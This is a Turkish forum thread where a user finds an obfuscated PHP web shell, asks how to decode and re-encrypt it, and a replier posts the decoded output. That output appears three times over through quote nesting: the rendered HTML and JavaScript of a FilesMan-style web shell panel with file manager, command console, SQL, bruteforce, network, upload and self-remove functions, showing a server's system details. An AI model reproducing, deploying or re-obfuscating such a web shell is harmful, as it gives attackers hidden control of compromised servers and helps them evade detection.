- 16 Ocak 2023
- 10
- 1
Bir Shell buldum ama nasıl decode yapıcam base64 değil galiba şu şekilde başlıyor eval(rawurldecode('
Bunu nasıl decode yaparım ve tekrar şifrelerim
Bunu nasıl decode yaparım ve tekrar şifrelerim
Peki decode?En basiti PHP koru'dan online yapabilirsin
Bir Shell buldum ama nasıl decode yapıcam base64 değil galiba şu şekilde başlıyor eval(rawurldecode('
Bunu nasıl decode yaparım ve tekrar şifrelerim
Evet. Bu bir PHP şifrelemesi.base64 değil galiba
Bununla alakalı yazılar buldum. Google amcaya sorman yeterli.Bunu nasıl decode yaparım
Pek bilgim yok ama internette bununla ilgili kesin bir sonuc bulabilirsin bence aatma seklin dogru olursa bulabilirsin he bide ChatGPT belki sana bir sonuç verebilir.shell dosyam bu internet üzerinde bulduğum için kaynak kodlarına bakmak istiyorum ama nasıl decode yapıcam
bazı shelleri priv obfuscatordan şifreliyorlar işe yaramıyor araçlar ama dediğin siteyi denedim çözemedi ama shelli yazan kardeşimiz şöyle bir kral hareket yapmışEn basiti PHP koru'dan online yapabilirsin
PHP ile pek bilgim yok ama nasıl yapıcam kodum şu şekildeevalden önceki kısmı alıp echo içerisine alıp deneyebilirsin
<?PHP
eval(rawurldecode('ŞİFRELİ KOD ÇOK UZUN'));
?>
kırdım dostum kodlar aşağıdaPHP ile pek bilgim yok ama nasıl yapıcam kodum şu şekilde
<?PHP eval(rawurldecode('ŞİFRELİ KOD ÇOK UZUN')); ?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title></title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '/runtime/php/3zed5ph8s_3zem5e9q4/';
var a_ = 'FilesMan'
var charset_ = 'Windows-1251';
var p1_ = '';
var p2_ = '';
var p3_ = '';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux 450aa482c05b 4.14.305-227.531.amzn2.x86_64 #1 SMP Tue Feb 14 09:55:28 UTC 2023 x86_64</nobr><br>2345 ( coderunner ) <span>Group:</span> ( )<br>7.4.3 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2023-07-15 16:19:25<br>39.99 GB <span>Free:</span> 23.79 GB (59%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/runtime/")'>runtime/</a><a href='#' onclick='g("FilesMan","/runtime/php/")'>php/</a><a href='#' onclick='g("FilesMan","/runtime/php/3zed5ph8s_3zem5e9q4/")'>3zed5ph8s_3zem5e9q4/</a> <font color=white>drwxr-xr-x</font> <a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value="." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/.');" ><b>[ . ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'.','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'.', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'.', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/..');" ><b>[ .. ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="HelloWorld.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php', 'view')">HelloWorld.php</a></td><td>36.39 KB</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php','chmod')"><font color=white>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'download')">D</a></td></tr><tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'>
<input type=hidden name=charset value='Windows-1251'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='tar'>Compress (tar.gz)</option></select> <input type='submit' value='>>'></td></tr></form></table></div>
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='Windows-1251'>
<span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>
bu arada bu tam kırılmış hali değilmiş yeni fark ettimkırdım dostum kodlar aşağıda
HTML:<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title></title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: #df5 !important; } span{ font-weight: bolder; } h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/runtime/php/3zed5ph8s_3zem5e9q4/'; var a_ = 'FilesMan' var charset_ = 'Windows-1251'; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; //if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux 450aa482c05b 4.14.305-227.531.amzn2.x86_64 #1 SMP Tue Feb 14 09:55:28 UTC 2023 x86_64</nobr><br>2345 ( coderunner ) <span>Group:</span> ( )<br>7.4.3 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2023-07-15 16:19:25<br>39.99 GB <span>Free:</span> 23.79 GB (59%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/runtime/")'>runtime/</a><a href='#' onclick='g("FilesMan","/runtime/php/")'>php/</a><a href='#' onclick='g("FilesMan","/runtime/php/3zed5ph8s_3zem5e9q4/")'>3zed5ph8s_3zem5e9q4/</a> <font color=white>drwxr-xr-x</font> <a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script> function sa() { for(i=0;i<d.files.elements.length;i++) if(d.files.elements[i].type == 'checkbox') d.files.elements[i].checked = d.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value="." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/.');" ><b>[ . ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'.','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'.', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'.', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/..');" ><b>[ .. ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="HelloWorld.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php', 'view')">HelloWorld.php</a></td><td>36.39 KB</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php','chmod')"><font color=white>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'download')">D</a></td></tr><tr><td colspan=7> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'> <input type=hidden name=charset value='Windows-1251'> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='tar'>Compress (tar.gz)</option></select> <input type='submit' value='>>'></td></tr></form></table></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value='Windows-1251'> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Detaylı analiz sonrasında nasıl yaptığını kısaca anlatır mısınkırdım dostum kodlar aşağıda
HTML:<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title></title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: #df5 !important; } span{ font-weight: bolder; } h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/runtime/php/3zed5ph8s_3zem5e9q4/'; var a_ = 'FilesMan' var charset_ = 'Windows-1251'; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; //if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux 450aa482c05b 4.14.305-227.531.amzn2.x86_64 #1 SMP Tue Feb 14 09:55:28 UTC 2023 x86_64</nobr><br>2345 ( coderunner ) <span>Group:</span> ( )<br>7.4.3 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2023-07-15 16:19:25<br>39.99 GB <span>Free:</span> 23.79 GB (59%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/runtime/")'>runtime/</a><a href='#' onclick='g("FilesMan","/runtime/php/")'>php/</a><a href='#' onclick='g("FilesMan","/runtime/php/3zed5ph8s_3zem5e9q4/")'>3zed5ph8s_3zem5e9q4/</a> <font color=white>drwxr-xr-x</font> <a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script> function sa() { for(i=0;i<d.files.elements.length;i++) if(d.files.elements[i].type == 'checkbox') d.files.elements[i].checked = d.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value="." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/.');" ><b>[ . ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'.','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'.', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'.', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/..');" ><b>[ .. ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="HelloWorld.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php', 'view')">HelloWorld.php</a></td><td>36.39 KB</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php','chmod')"><font color=white>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'download')">D</a></td></tr><tr><td colspan=7> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'> <input type=hidden name=charset value='Windows-1251'> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='tar'>Compress (tar.gz)</option></select> <input type='submit' value='>>'></td></tr></form></table></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value='Windows-1251'> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
bu arada bu tam kırılmış hali değilmiş yeni fark ettim
bir dosya çıkartıyor tempe yarın daha detaylı analiz ederim.
